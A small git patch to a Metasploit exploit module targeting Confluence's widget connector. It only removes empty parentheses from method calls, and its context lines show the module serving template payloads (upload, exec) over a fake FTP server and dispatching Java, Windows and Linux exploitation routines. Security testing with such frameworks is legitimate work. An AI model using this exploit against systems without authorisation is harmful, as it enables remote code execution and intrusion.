From 2c3aec897f0b56b867c40158493c7120b710e222 Mon Sep 17 00:00:00 2001 From: rrockru Date: Fri, 12 Apr 2019 22:06:56 +0300 Subject: [PATCH] Refactoring --- .../multi/http/confluence_widget_connector.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/modules/exploits/multi/http/confluence_widget_connector.rb b/modules/exploits/multi/http/confluence_widget_connector.rb index a2970a0e60..11fd095a6f 100644 --- a/modules/exploits/multi/http/confluence_widget_connector.rb +++ b/modules/exploits/multi/http/confluence_widget_connector.rb @@ -81,15 +81,15 @@ class MetasploitModule < Msf::Exploit::Remote c.put("150 Opening BINARY mode data connection for #{arg}\r\n") case arg when /check\.vm$/ - conn.put(wrap(get_check_vm())) + conn.put(wrap(get_check_vm)) when /javaprop\.vm$/ - conn.put(wrap(get_javaprop_vm())) + conn.put(wrap(get_javaprop_vm)) when /upload\.vm$/ - conn.put(wrap(get_upload_vm())) + conn.put(wrap(get_upload_vm)) when /exec\.vm$/ - conn.put(wrap(get_exec_vm())) + conn.put(wrap(get_exec_vm)) else - conn.put(wrap(get_dummy_vm())) + conn.put(wrap(get_dummy_vm)) end c.put("226 Transfer complete.\r\n") conn.close @@ -431,11 +431,11 @@ class MetasploitModule < Msf::Exploit::Remote case target.name.downcase when /java$/ - exploit_as_java() + exploit_as_java when /windows$/ - exploit_as_windows() + exploit_as_windows when /linux$/ - exploit_as_linux() + exploit_as_linux end end